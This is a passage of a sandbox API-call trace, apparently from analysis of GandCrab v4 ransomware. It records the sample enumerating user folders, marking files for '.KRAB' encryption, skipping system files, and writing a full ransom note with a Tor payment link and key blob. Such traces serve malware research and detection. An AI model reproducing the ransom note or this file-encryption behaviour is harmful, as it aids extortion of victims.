(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 79 [0060.204] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0060.204] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd660 [0060.204] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.205] FindNextFileW (in: hFindFile=0xfbd660, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.205] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.205] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.205] FindNextFileW (in: hFindFile=0xfbd660, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.205] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.205] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.205] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a08d2ca4dee3d.lock" [0060.205] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.205] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 107 [0060.205] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a08d2ca4dee3d.lock") returned 102 [0060.205] lstrlenW (lpString=".lock") returned 5 [0060.205] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.205] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.205] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.206] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.206] FindNextFileW (in: hFindFile=0xfbd660, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.206] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.206] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.206] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\KRAB-DECRYPT.txt" [0060.206] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.206] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\KRAB-DECRYPT.txt.KRAB") returned 100 [0060.206] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\KRAB-DECRYPT.txt") returned 95 [0060.206] lstrlenW (lpString=".txt") returned 4 [0060.206] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.207] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.207] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.207] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\KRAB-DECRYPT.txt") returned 95 [0060.207] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\KRAB-DECRYPT.txt") returned 95 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.207] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.207] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.207] FindNextFileW (in: hFindFile=0xfbd660, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0060.207] FindClose (in: hFindFile=0xfbd660 | out: hFindFile=0xfbd660) returned 1 [0060.208] CloseHandle (hObject=0x448) returned 1 [0060.209] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0060.209] FindClose (in: hFindFile=0xfbd1e0 | out: hFindFile=0xfbd1e0) returned 1 [0060.209] CloseHandle (hObject=0x440) returned 1 [0060.209] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0060.209] FindClose (in: hFindFile=0xfbd960 | out: hFindFile=0xfbd960) returned 1 [0060.209] CloseHandle (hObject=0x3ac) returned 1 [0060.209] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0060.209] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.209] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.210] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt" [0060.210] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.210] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt.KRAB") returned 69 [0060.210] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt") returned 64 [0060.210] lstrlenW (lpString=".txt") returned 4 [0060.210] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.210] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.210] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt") returned 64 [0060.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt") returned 64 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.211] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.211] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.211] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0060.211] lstrcmpW (lpString1="MMC", lpString2=".") returned 1 [0060.211] lstrcmpW (lpString1="MMC", lpString2="..") returned 1 [0060.211] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="MMC" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC" [0060.211] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\" [0060.211] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.212] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.212] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.212] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.212] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.212] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.212] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.212] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\\\KRAB-DECRYPT.txt") returned 69 [0060.212] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\mmc\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0060.214] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.214] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.214] CloseHandle (hObject=0x3ac) returned 1 [0060.215] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.215] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.215] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x19f)) [0060.216] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.216] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.216] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.216] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a08d2ca4dee3d.lock") returned 75 [0060.216] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\mmc\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0060.217] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.217] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.217] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\") returned 52 [0060.217] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\*" [0060.217] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd5a0 [0060.218] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.218] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.218] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.218] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.218] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.218] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.218] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.218] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a08d2ca4dee3d.lock" [0060.218] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.218] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 80 [0060.218] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a08d2ca4dee3d.lock") returned 75 [0060.218] lstrlenW (lpString=".lock") returned 5 [0060.218] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.218] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.218] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.219] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.219] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.219] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.219] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.219] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\KRAB-DECRYPT.txt" [0060.219] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.219] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\KRAB-DECRYPT.txt.KRAB") returned 73 [0060.219] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\KRAB-DECRYPT.txt") returned 68 [0060.219] lstrlenW (lpString=".txt") returned 4 [0060.219] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.220] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.220] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.220] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\KRAB-DECRYPT.txt") returned 68 [0060.220] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\KRAB-DECRYPT.txt") returned 68 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.220] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.220] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.220] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0060.220] FindClose (in: hFindFile=0xfbd5a0 | out: hFindFile=0xfbd5a0) returned 1 [0060.221] CloseHandle (hObject=0x3ac) returned 1 [0060.221] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0060.221] lstrcmpW (lpString1="MS Project", lpString2=".") returned 1 [0060.221] lstrcmpW (lpString1="MS Project", lpString2="..") returned 1 [0060.221] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="MS Project" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project" [0060.221] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\" [0060.221] VirtualAlloc (lpAddress=0x0, dwSize=0x201, 